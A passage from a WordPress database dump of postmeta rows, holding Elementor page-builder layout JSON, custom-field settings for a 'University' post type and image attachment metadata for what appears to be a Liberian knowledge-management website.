rrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"selected_show_date_icon\":{\"value\":\"fas fa-check-circle\",\"library\":\"fa-solid\"},\"__fa4_migrated\":{\"selected_show_date_icon\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5637a09\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"97f9083\"}]},\"elements\":[{\"id\":\"0f20919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5d8a038\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b73161c\"}]},\"elements\":[{\"id\":\"1dd8ad2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(33848,4903,'_elementor_pro_version','3.3.6'),(33850,4904,'_elementor_edit_mode','builder'),(33851,4904,'_elementor_template_type','wp-page'),(33852,4904,'_elementor_version','3.4.1'),(33853,4904,'_wp_page_template','default'),(33854,4904,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\"}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8043d05\",\"elType\":\"widget\",\"settings\":{\"number\":10,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"mea_resource\",\"title_trimmed_ending_text\":\"...\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"8a63abb\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"e5c76dd\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5637a09\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"97f9083\"}]},\"elements\":[{\"id\":\"0f20919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5d8a038\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b73161c\"}]},\"elements\":[{\"id\":\"1dd8ad2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(33856,4904,'_elementor_pro_version','3.3.6'),(33858,84,'_elementor_controls_usage','a:3:{s:9:\"jet-posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:15:\"section_general\";a:4:{s:6:\"number\";i:1;s:7:\"columns\";i:1;s:17:\"equal_height_cols\";i:1;s:9:\"post_type\";i:1;}s:27:\"section_posts_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}}'),(33860,4905,'_edit_lock','1660921124:42'),(33861,4905,'_last_editor_used_jetpack','block-editor'),(33863,4905,'_edit_last','42'),(33864,4905,'kava_extra_enable_breadcrumbs','inherit'),(33865,4905,'_elementor_edit_mode','builder'),(33866,4905,'_elementor_template_type','wp-page'),(33867,4905,'_elementor_version','3.6.6'),(33868,4905,'_elementor_pro_version','3.7.1'),(33869,4907,'type','post_type'),(33870,4907,'storage','meta'),(33871,4907,'label_singular','University'),(33872,4907,'public','1'),(33873,4907,'show_ui','1'),(33874,4907,'rest_enable','1'),(33875,4907,'supports_title','1'),(33876,4907,'supports_editor','1'),(33877,4907,'_migrated_28','1'),(33879,4907,'required','0'),(33880,4907,'show_in_menu','1'),(33881,4907,'menu_position','0'),(33882,4907,'show_in_nav_menus','1'),(33883,4907,'show_in_admin_bar','1'),(33884,4907,'supports_thumbnail','1'),(33885,4908,'object_type','group'),(33886,4908,'object_storage_type','post_type'),(33887,4908,'parent','4907'),(33888,4909,'type','file'),(33889,4909,'sister_id','-- Select One --'),(33890,4909,'group','4908'),(33891,4909,'required','0'),(33892,4909,'file_format_type','single'),(33893,4909,'file_uploader','attachment'),(33894,4909,'file_attachment_tab','upload'),(33895,4909,'file_upload_dir','wp'),(33896,4909,'file_edit_title','1'),(33897,4909,'file_show_edit_link','0'),(33898,4909,'file_linked','0'),(33899,4909,'file_limit','0'),(33900,4909,'file_type','images'),(33901,4909,'file_field_template','rows'),(33902,4909,'file_add_button','Add File'),(33903,4909,'file_modal_title','Attach a file'),(33904,4909,'file_modal_add_button','Add File'),(33905,4909,'roles_allowed','administrator'),(33906,4909,'rest_pick_response','array'),(33907,4909,'rest_pick_depth','1'),(33908,4910,'type','website'),(33909,4910,'sister_id','-- Select One --'),(33910,4910,'group','4908'),(33911,4910,'required','0'),(33912,4910,'website_format','normal'),(33913,4910,'website_allow_port','0'),(33914,4910,'website_clickable','0'),(33915,4910,'website_new_window','0'),(33916,4910,'website_max_length','255'),(33917,4910,'website_html5','0'),(33918,4910,'roles_allowed','administrator'),(33919,4910,'rest_pick_response','array'),(33920,4910,'rest_pick_depth','1'),(33921,4911,'_edit_lock','1661163011:42'),(33922,4911,'_last_editor_used_jetpack','block-editor'),(33923,4912,'_wp_attached_file','2022/08/ul-logo-1.png'),(33924,4912,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2022/08/ul-logo-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ul-logo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"ul-logo-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33925,4913,'_wp_attached_file','2022/08/UL.jpg'),(33926,4913,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2022/08/UL.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"UL-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"UL-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"UL-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"UL-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:13:\"UL-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:14:\"UL-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:14:\"UL-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:14:\"UL-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:14:\"UL-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:14:\"UL-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:14:\"UL-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(33927,4911,'_thumbnail_id','4937'),(33928,4911,'_edit_last','42'),(33929,4911,'website_link','https://ul.edu.lr/'),(33930,4911,'_pods_university_logo','a:1:{i:0;i:4912;}'),(33932,4914,'_edit_lock','1660921925:42'),(33933,4914,'_last_editor_used_jetpack','block-editor'),(33934,4914,'_edit_last','42'),(33935,4914,'kava_extra_enable_breadcrumbs','inherit'),(33936,4914,'_elementor_edit_mode','builder'),(33937,4914,'_elementor_template_type','wp-page'),(33938,4914,'_elementor_version','3.6.6'),(33939,4914,'_elementor_pro_version','3.7.1'),(33940,3800,'_elementor_screenshot_failed','2022-08-19 15:14:57'),(33944,4916,'_elementor_is_screenshot','1'),(33945,4916,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_3834_2022-08-19-15-15-38_27115ce5.png'),(33946,3834,'_elementor_screenshot','a:2:{s:2:\"id\";i:4916;s:3:\"url\";s:129:\"https://ekmsliberia.info/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_3834_2022-08-19-15-15-38_27115ce5.png\";}'),(33947,4917,'_elementor_is_screenshot','1'),(33948,4917,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_3877_2022-08-19-15-15-53_44ba73d4.png'),(33949,3877,'_elementor_screenshot','a:2:{s:2:\"id\";i:4917;s:3:\"url\";s:129:\"https://ekmsliberia.info/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_3877_2022-08-19-15-15-53_44ba73d4.png\";}'),(33950,4918,'_elementor_edit_mode','builder'),(33951,4918,'_elementor_template_type','single-post'),(33952,4919,'_elementor_edit_mode','builder'),(33953,4919,'_elementor_template_type','single-post'),(33954,4918,'_elementor_version','3.6.6'),(33955,4918,'_elementor_pro_version','3.7.1'),(33956,4918,'_edit_lock','1660924766:42'),(33958,4918,'_wp_page_template','default'),(33959,4918,'_elementor_data','[{\"id\":\"80da151\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d430d58\"}]},\"elements\":[{\"id\":\"9ba3c49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dce858c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"507b6ec\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"cef23df\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.6520000000000010231815394945442676544189453125},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"e5be318\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Website Link\",\"selected_icon\":{\"value\":\"fas fa-link\",\"library\":\"fa-solid\"},\"_id\":\"94e8153\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"7966798\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"dbe4f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.260999999999999232613845379091799259185791015625,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"b743106\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"420f70d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Auniversity_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"e9731a1\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(33961,4918,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(33962,4920,'_elementor_edit_mode','builder'),(33963,4920,'_elementor_template_type','single-post'),(33964,4920,'_elementor_version','3.6.6'),(33965,4920,'_elementor_pro_version','3.7.1'),(33966,4920,'_wp_page_template','default'),(33967,4920,'_elementor_data','[{\"id\":\"9e95397\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50371c2\"}]},\"elements\":[{\"id\":\"f55af32\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e99031\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44555ac\"}]},\"elements\":[{\"id\":\"034e747\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ca2947\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9157f27\"}]},\"elements\":[{\"id\":\"5a17caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b68b42\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7f3d7de\"}]},\"elements\":[{\"id\":\"10d3b64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6b7f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Website Link\",\"button_text_color\":\"#0A3C11\",\"background_background\":\"\",\"background_color_b\":\"\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"4f0dd63\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"},\"__globals__\":{\"button_text_color\":\"globals\\/colors?id=primary\",\"background_color\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(38589,3901,'_elementor_css','a:6:{s:4:\"time\";i:1770854612;s:5:\"fonts\";a:1:{i:0;s:6:\"Roboto\";}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:24:{i:0;s:7:\"b15ea6e\";i:1;s:7:\"b15ea6e\";i:2;s:7:\"9099e3a\";i:3;s:7:\"bcc8fe1\";i:4;s:7:\"c755a3b\";i:5;s:7:\"6e47c97\";i:6;s:7:\"6e47c97\";i:7;s:7:\"9099e3a\";i:8;s:7:\"bcc8fe1\";i:9;s:7:\"c755a3b\";i:10;s:7:\"6e47c97\";i:11;s:7:\"6e47c97\";i:12;s:7:\"b15ea6e\";i:13;s:7:\"b15ea6e\";i:14;s:7:\"9099e3a\";i:15;s:7:\"bcc8fe1\";i:16;s:7:\"c755a3b\";i:17;s:7:\"6e47c97\";i:18;s:7:\"6e47c97\";i:19;s:7:\"9099e3a\";i:20;s:7:\"bcc8fe1\";i:21;s:7:\"c755a3b\";i:22;s:7:\"6e47c97\";i:23;s:7:\"6e47c97\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(33969,4920,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(33970,4921,'_elementor_edit_mode','builder'),(33971,4921,'_elementor_template_type','single-post'),(33972,4921,'_elementor_version','3.6.6'),(33973,4921,'_elementor_pro_version','3.7.1'),(33974,4921,'_wp_page_template','default'),(33975,4921,'_elementor_data','[{\"id\":\"9e95397\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50371c2\"}]},\"elements\":[{\"id\":\"f55af32\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e99031\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44555ac\"}]},\"elements\":[{\"id\":\"034e747\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ca2947\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9157f27\"}]},\"elements\":[{\"id\":\"5a17caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3f4ad4d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e686258\"}]},\"elements\":[{\"id\":\"71453c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e5be318\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Website Link\",\"selected_icon\":{\"value\":\"fas fa-link\",\"library\":\"fa-solid\"},\"_id\":\"94e8153\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"7966798\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(33977,4921,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(33979,4918,'_elementor_conditions','a:1:{i:0;s:27:\"include/singular/university\";}'),(33981,4922,'_elementor_edit_mode','builder'),(33982,4922,'_elementor_template_type','single-post'),(33983,4922,'_elementor_version','3.6.6'),(33984,4922,'_elementor_pro_version','3.7.1'),(33985,4922,'_wp_page_template','default'),(33986,4922,'_elementor_data','[{\"id\":\"9e95397\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50371c2\"}]},\"elements\":[{\"id\":\"f55af32\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e99031\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44555ac\"}]},\"elements\":[{\"id\":\"034e747\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ca2947\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9157f27\"}]},\"elements\":[{\"id\":\"5a17caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3f4ad4d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e686258\"}]},\"elements\":[{\"id\":\"71453c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e5be318\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Website Link\",\"selected_icon\":{\"value\":\"fas fa-link\",\"library\":\"fa-solid\"},\"_id\":\"94e8153\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"7966798\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(33988,4922,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(33989,4922,'_elementor_conditions','a:1:{i:0;s:27:\"include/singular/university\";}'),(34002,4924,'_elementor_edit_mode','builder'),(34003,4924,'_elementor_template_type','single-post'),(34004,4924,'_elementor_version','3.6.6'),(34005,4924,'_elementor_pro_version','3.7.1'),(34006,4924,'_wp_page_template','default'),(34007,4924,'_elementor_data','[{\"id\":\"80da151\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d430d58\"}]},\"elements\":[{\"id\":\"9ba3c49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dce858c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"507b6ec\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"cef23df\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.6520000000000010231815394945442676544189453125},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" 